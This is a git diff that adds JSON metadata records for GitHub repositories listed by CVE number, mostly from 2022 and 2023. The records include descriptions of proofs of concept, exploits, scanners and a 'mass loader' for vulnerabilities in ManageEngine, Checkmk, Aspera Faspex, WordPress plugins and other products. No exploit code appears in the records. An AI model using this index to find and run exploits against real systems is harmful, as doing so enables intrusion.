"login": "Cedric1314", + "id": 42855430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42855430?v=4", + "html_url": "https:\/\/github.com\/Cedric1314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cedric1314\/CVE-2022-47872", + "description": null, + "fork": false, + "created_at": "2023-02-01T02:34:19Z", + "updated_at": "2023-02-01T02:34:19Z", + "pushed_at": "2023-02-01T03:13:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47909.json b/2022/CVE-2022-47909.json new file mode 100644 index 0000000000..eba28d3e69 --- /dev/null +++ b/2022/CVE-2022-47909.json @@ -0,0 +1,33 @@ +[ + { + "id": 619371166, + "name": "CVE-2022-47909_unauth_arbitrary_file_deletion", + "full_name": "JacobEbben\/CVE-2022-47909_unauth_arbitrary_file_deletion", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-47909_unauth_arbitrary_file_deletion", + "description": "Unauthenticated Arbitrary File Deletion by abusing Livestatus Query Language Injection in Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL)", + "fork": false, + "created_at": "2023-03-27T02:16:51Z", + "updated_at": "2023-03-27T09:18:20Z", + "pushed_at": "2023-03-27T14:28:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47952.json b/2022/CVE-2022-47952.json new file mode 100644 index 0000000000..815a041ce9 --- /dev/null +++ b/2022/CVE-2022-47952.json @@ -0,0 +1,33 @@ +[ + { + "id": 584002684, + "name": "CVE-2022-47952", + "full_name": "MaherAzzouzi\/CVE-2022-47952", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-47952", + "description": "LXC Information Disclosure vulnerability.", + "fork": false, + "created_at": "2022-12-31T21:24:46Z", + "updated_at": "2023-02-03T21:27:48Z", + "pushed_at": "2022-12-31T21:25:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47966.json b/2022/CVE-2022-47966.json new file mode 100644 index 0000000000..88fd313388 --- /dev/null +++ b/2022/CVE-2022-47966.json @@ -0,0 +1,172 @@ +[ + { + "id": 590196501, + "name": "CVE-2022-47966", + "full_name": "horizon3ai\/CVE-2022-47966", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-47966", + "description": "POC for CVE-2022-47966 affecting multiple ManageEngine products", + "fork": false, + "created_at": "2023-01-17T21:26:28Z", + "updated_at": "2024-10-28T10:06:03Z", + "pushed_at": "2023-01-19T13:10:07Z", + "stargazers_count": 124, + "watchers_count": 124, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 124, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 590861031, + "name": "PoC-for-ME-SAML-Vulnerability", + "full_name": "shameem-testing\/PoC-for-ME-SAML-Vulnerability", + "owner": { + "login": "shameem-testing", + "id": 83210904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83210904?v=4", + "html_url": "https:\/\/github.com\/shameem-testing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shameem-testing\/PoC-for-ME-SAML-Vulnerability", + "description": "PoC for cve-2022-47966", + "fork": false, + "created_at": "2023-01-19T11:41:05Z", + "updated_at": "2023-01-19T11:41:05Z", + "pushed_at": "2023-01-19T12:29:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592261667, + "name": "CVE-2022-47966", + "full_name": "Inplex-sys\/CVE-2022-47966", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-47966", + "description": "The manage engine mass loader for CVE-2022-47966", + "fork": false, + "created_at": "2023-01-23T10:45:23Z", + "updated_at": "2023-03-11T00:41:31Z", + "pushed_at": "2023-01-23T10:46:43Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "exploit", + "loader", + "manageengone", + "rce", + "scanner" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592277196, + "name": "CVE-2022-47966_checker", + "full_name": "ACE-Responder\/CVE-2022-47966_checker", + "owner": { + "login": "ACE-Responder", + "id": 123371860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123371860?v=4", + "html_url": "https:\/\/github.com\/ACE-Responder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ACE-Responder\/CVE-2022-47966_checker", + "description": "Run on your ManageEngine server", + "fork": false, + "created_at": "2023-01-23T11:33:29Z", + "updated_at": "2024-01-04T14:45:12Z", + "pushed_at": "2023-01-23T12:09:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 592376575, + "name": "CVE-2022-47966-Scan", + "full_name": "vonahisec\/CVE-2022-47966-Scan", + "owner": { + "login": "vonahisec", + "id": 31076758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31076758?v=4", + "html_url": "https:\/\/github.com\/vonahisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vonahisec\/CVE-2022-47966-Scan", + "description": "Python scanner for CVE-2022-47966. Supports ~10 of the 24 affected products.", + "fork": false, + "created_at": "2023-01-23T15:49:10Z", + "updated_at": "2024-05-16T11:56:13Z", + "pushed_at": "2023-02-08T19:25:50Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blue-team", + "pentesting", + "python", + "red-team", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47986.json b/2022/CVE-2022-47986.json new file mode 100644 index 0000000000..17ad7d679f --- /dev/null +++ b/2022/CVE-2022-47986.json @@ -0,0 +1,110 @@ +[ + { + "id": 596890339, + "name": "CVE-2022-47986", + "full_name": "ohnonoyesyes\/CVE-2022-47986", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2022-47986", + "description": "Aspera Faspex Pre Auth RCE", + "fork": false, + "created_at": "2023-02-03T06:32:13Z", + "updated_at": "2023-06-21T05:14:03Z", + "pushed_at": "2023-02-03T06:33:42Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600046987, + "name": "CVE-2022-47986", + "full_name": "dhina016\/CVE-2022-47986", + "owner": { + "login": "dhina016", + "id": 46128375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46128375?v=4", + "html_url": "https:\/\/github.com\/dhina016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhina016\/CVE-2022-47986", + "description": null, + "fork": false, + "created_at": "2023-02-10T13:16:42Z", + "updated_at": "2023-02-10T13:16:42Z", + "pushed_at": "2023-02-10T13:17:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611950909, + "name": "CVE-2022-47986", + "full_name": "mauricelambert\/CVE-2022-47986", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2022-47986", + "description": "CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.", + "fork": false, + "created_at": "2023-03-09T22:03:48Z", + "updated_at": "2023-03-09T22:33:55Z", + "pushed_at": "2023-03-09T22:31:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "aspera", + "cve-2022-47986", + "deserialization", + "exploit", + "faspex", + "ibm", + "metasploit", + "nmap", + "poc", + "python3", + "rce", + "ruby", + "vulnerability", + "yaml" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48150.json b/2022/CVE-2022-48150.json new file mode 100644 index 0000000000..02fe245652 --- /dev/null +++ b/2022/CVE-2022-48150.json @@ -0,0 +1,33 @@ +[ + { + "id": 624508549, + "name": "-CVE-2022-48150", + "full_name": "sahilop123\/-CVE-2022-48150", + "owner": { + "login": "sahilop123", + "id": 95895762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95895762?v=4", + "html_url": "https:\/\/github.com\/sahilop123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahilop123\/-CVE-2022-48150", + "description": "I Found the reflected xss vulnerability in shopware 5 .for more details check my poc video ", + "fork": false, + "created_at": "2023-04-06T16:14:42Z", + "updated_at": "2023-12-14T09:35:20Z", + "pushed_at": "2023-04-06T19:01:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48194.json b/2022/CVE-2022-48194.json new file mode 100644 index 0000000000..04166d0ebc --- /dev/null +++ b/2022/CVE-2022-48194.json @@ -0,0 +1,33 @@ +[ + { + "id": 583289521, + "name": "internet-of-vulnerable-things", + "full_name": "otsmr\/internet-of-vulnerable-things", + "owner": { + "login": "otsmr", + "id": 48922451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48922451?v=4", + "html_url": "https:\/\/github.com\/otsmr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/otsmr\/internet-of-vulnerable-things", + "description": "The results of my small term paper on the topic of the Internet of Vulnerable Things and the exploit for CVE-2022-48194.", + "fork": false, + "created_at": "2022-12-29T10:32:23Z", + "updated_at": "2024-09-10T15:03:19Z", + "pushed_at": "2023-01-20T23:38:40Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48197.json b/2022/CVE-2022-48197.json new file mode 100644 index 0000000000..bd1f5b0249 --- /dev/null +++ b/2022/CVE-2022-48197.json @@ -0,0 +1,33 @@ +[ + { + "id": 584354205, + "name": "CVE-2022-48197", + "full_name": "ryan412\/CVE-2022-48197", + "owner": { + "login": "ryan412", + "id": 54446262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54446262?v=4", + "html_url": "https:\/\/github.com\/ryan412", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ryan412\/CVE-2022-48197", + "description": null, + "fork": false, + "created_at": "2023-01-02T10:27:04Z", + "updated_at": "2023-01-02T10:27:04Z", + "pushed_at": "2023-01-02T10:31:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48311.json b/2022/CVE-2022-48311.json new file mode 100644 index 0000000000..bbcb02dcfe --- /dev/null +++ b/2022/CVE-2022-48311.json @@ -0,0 +1,33 @@ +[ + { + "id": 598664381, + "name": "CVE-2022-48311", + "full_name": "swzhouu\/CVE-2022-48311", + "owner": { + "login": "swzhouu", + "id": 74352439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74352439?v=4", + "html_url": "https:\/\/github.com\/swzhouu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swzhouu\/CVE-2022-48311", + "description": "HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B HTTP configuration page Cross Site Scripting (XSS) Vulnerability", + "fork": false, + "created_at": "2023-02-07T15:13:33Z", + "updated_at": "2023-02-07T15:14:08Z", + "pushed_at": "2023-02-07T15:13:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48429.json b/2022/CVE-2022-48429.json new file mode 100644 index 0000000000..4cf920f2bc --- /dev/null +++ b/2022/CVE-2022-48429.json @@ -0,0 +1,33 @@ +[ + { + "id": 636352279, + "name": "CVE-2022-48429_poc", + "full_name": "echo-devim\/CVE-2022-48429_poc", + "owner": { + "login": "echo-devim", + "id": 11312542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11312542?v=4", + "html_url": "https:\/\/github.com\/echo-devim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/echo-devim\/CVE-2022-48429_poc", + "description": "PoC for CVE-2022-48429 - Youtrack stored XSS", + "fork": false, + "created_at": "2023-05-04T16:55:20Z", + "updated_at": "2024-07-09T11:39:18Z", + "pushed_at": "2023-05-04T17:01:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48474.json b/2022/CVE-2022-48474.json new file mode 100644 index 0000000000..cf8f863f5e --- /dev/null +++ b/2022/CVE-2022-48474.json @@ -0,0 +1,33 @@ +[ + { + "id": 629982721, + "name": "CVE-2022-48474_CVE-2022-48475", + "full_name": "sapellaniz\/CVE-2022-48474_CVE-2022-48475", + "owner": { + "login": "sapellaniz", + "id": 60947777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60947777?v=4", + "html_url": "https:\/\/github.com\/sapellaniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sapellaniz\/CVE-2022-48474_CVE-2022-48475", + "description": "CVE-2022-48474 &CVE-2022-48475 PoCs & exploits ", + "fork": false, + "created_at": "2023-04-19T12:27:52Z", + "updated_at": "2024-07-15T20:18:17Z", + "pushed_at": "2023-04-19T12:50:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48565.json b/2022/CVE-2022-48565.json new file mode 100644 index 0000000000..afdc6bbf16 --- /dev/null +++ b/2022/CVE-2022-48565.json @@ -0,0 +1,33 @@ +[ + { + "id": 876527302, + "name": "CVE-2022-48565-POC", + "full_name": "Einstein2150\/CVE-2022-48565-POC", + "owner": { + "login": "Einstein2150", + "id": 22019133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22019133?v=4", + "html_url": "https:\/\/github.com\/Einstein2150", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Einstein2150\/CVE-2022-48565-POC", + "description": "A proof-of-concept for CVE-2022-48565 - python plistlib XML deserialisation attack", + "fork": false, + "created_at": "2024-10-22T05:58:24Z", + "updated_at": "2024-11-13T13:42:39Z", + "pushed_at": "2024-10-28T16:07:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4896.json b/2022/CVE-2022-4896.json new file mode 100644 index 0000000000..83349c1a74 --- /dev/null +++ b/2022/CVE-2022-4896.json @@ -0,0 +1,33 @@ +[ + { + "id": 629992953, + "name": "CVE-2022-4896", + "full_name": "sapellaniz\/CVE-2022-4896", + "owner": { + "login": "sapellaniz", + "id": 60947777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60947777?v=4", + "html_url": "https:\/\/github.com\/sapellaniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sapellaniz\/CVE-2022-4896", + "description": "CVE-2022-4896 PoCs & exploits ", + "fork": false, + "created_at": "2023-04-19T12:53:03Z", + "updated_at": "2023-04-19T12:55:00Z", + "pushed_at": "2023-04-19T12:54:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4939.json b/2022/CVE-2022-4939.json new file mode 100644 index 0000000000..e5670570b2 --- /dev/null +++ b/2022/CVE-2022-4939.json @@ -0,0 +1,33 @@ +[ + { + "id": 624443836, + "name": "PoC-CVE-2022-4939-", + "full_name": "BaconCriCRi\/PoC-CVE-2022-4939-", + "owner": { + "login": "BaconCriCRi", + "id": 130064933, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130064933?v=4", + "html_url": "https:\/\/github.com\/BaconCriCRi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BaconCriCRi\/PoC-CVE-2022-4939-", + "description": null, + "fork": false, + "created_at": "2023-04-06T13:34:09Z", + "updated_at": "2023-04-06T13:37:46Z", + "pushed_at": "2023-04-06T13:50:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4944.json b/2022/CVE-2022-4944.json new file mode 100644 index 0000000000..64bf5fefbc --- /dev/null +++ b/2022/CVE-2022-4944.json @@ -0,0 +1,33 @@ +[ + { + "id": 630962699, + "name": "CVE-2022-4944", + "full_name": "brosck\/CVE-2022-4944", + "owner": { + "login": "brosck", + "id": 71796063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71796063?v=4", + "html_url": "https:\/\/github.com\/brosck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brosck\/CVE-2022-4944", + "description": "「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload", + "fork": false, + "created_at": "2023-04-21T15:09:37Z", + "updated_at": "2024-07-03T23:33:36Z", + "pushed_at": "2023-04-21T16:28:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-5561.json b/2022/CVE-2022-5561.json new file mode 100644 index 0000000000..abf55d0f64 --- /dev/null +++ b/2022/CVE-2022-5561.json @@ -0,0 +1,33 @@ +[ + { + "id": 508226524, + "name": "CVE-2022-5561", + "full_name": "Kvi74\/CVE-2022-5561", + "owner": { + "login": "Kvi74", + "id": 31023803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31023803?v=4", + "html_url": "https:\/\/github.com\/Kvi74", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kvi74\/CVE-2022-5561", + "description": "红队,蓝队,免杀", + "fork": false, + "created_at": "2022-06-28T09:00:26Z", + "updated_at": "2023-10-26T08:06:13Z", + "pushed_at": "2022-06-28T09:00:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-8475.json b/2022/CVE-2022-8475.json new file mode 100644 index 0000000000..7f820274f0 --- /dev/null +++ b/2022/CVE-2022-8475.json @@ -0,0 +1,33 @@ +[ + { + "id": 508226685, + "name": "CVE-2022-8475", + "full_name": "Kvi74\/CVE-2022-8475", + "owner": { + "login": "Kvi74", + "id": 31023803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31023803?v=4", + "html_url": "https:\/\/github.com\/Kvi74", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kvi74\/CVE-2022-8475", + "description": "工控安全,溯源", + "fork": false, + "created_at": "2022-06-28T09:00:55Z", + "updated_at": "2024-06-19T14:37:27Z", + "pushed_at": "2022-06-28T09:00:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0045.json b/2023/CVE-2023-0045.json new file mode 100644 index 0000000000..98c53e83e2 --- /dev/null +++ b/2023/CVE-2023-0045.json @@ -0,0 +1,64 @@ +[ + { + "id": 597559046, + "name": "CVE-2023-0045", + "full_name": "ASkyeye\/CVE-2023-0045", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2023-0045", + "description": null, + "fork": false, + "created_at": "2023-02-04T22:42:21Z", + "updated_at": "2024-10-16T23:27:28Z", + "pushed_at": "2023-02-03T22:22:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 598766898, + "name": "CVE-2023-0045", + "full_name": "es0j\/CVE-2023-0045", + "owner": { + "login": "es0j", + "id": 37257235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37257235?v=4", + "html_url": "https:\/\/github.com\/es0j", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/es0j\/CVE-2023-0045", + "description": null, + "fork": false, + "created_at": "2023-02-07T19:12:41Z", + "updated_at": "2023-09-14T12:39:41Z", + "pushed_at": "2023-02-07T19:15:48Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0099.json b/2023/CVE-2023-0099.json new file mode 100644 index 0000000000..18c7038308 --- /dev/null +++ b/2023/CVE-2023-0099.json @@ -0,0 +1,33 @@ +[ + { + "id": 693003626, + "name": "CVE-2023-0099-exploit", + "full_name": "amirzargham\/CVE-2023-0099-exploit", + "owner": { + "login": "amirzargham", + "id": 133110721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4", + "html_url": "https:\/\/github.com\/amirzargham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amirzargham\/CVE-2023-0099-exploit", + "description": "simple urls < 115 - Reflected XSS", + "fork": false, + "created_at": "2023-09-18T06:44:44Z", + "updated_at": "2024-01-12T02:47:49Z", + "pushed_at": "2024-02-10T05:04:22Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0156.json b/2023/CVE-2023-0156.json new file mode 100644 index 0000000000..2f46c4daba --- /dev/null +++ b/2023/CVE-2023-0156.json @@ -0,0 +1,33 @@ +[ + { + "id": 695786615, + "name": "CVE-2023-0156", + "full_name": "b0marek\/CVE-2023-0156", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-0156", + "description": "Repository for CVE-2023-0156 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:10:31Z", + "updated_at": "2023-09-24T08:10:31Z", + "pushed_at": "2023-09-24T08:17:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0157.json b/2023/CVE-2023-0157.json new file mode 100644 index 0000000000..df47a83efc --- /dev/null +++ b/2023/CVE-2023-0157.json @@ -0,0 +1,33 @@ +[ + { + "id": 695788809, + "name": "CVE-2023-0157", + "full_name": "b0marek\/CVE-2023-0157", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-0157", + "description": "Repository for CVE-2023-0157 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:20:30Z", + "updated_at": "2023-09-24T08:20:30Z", + "pushed_at": "2023-09-24T08:24:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0159.json b/2023/CVE-2023-0159.json new file mode 100644 index 0000000000..617013d333 --- /dev/null +++ b/2023/CVE-2023-0159.json @@ -0,0 +1,42 @@ +[ + { + "id": 690020929, + "name": "EVCer", + "full_name": "im-hanzou\/EVCer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/EVCer", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2023-0159 - Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated LFI", + "fork": false, + "created_at": "2023-09-11T11:36:35Z", + "updated_at": "2023-09-23T08:46:32Z", + "pushed_at": "2023-09-11T12:18:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": 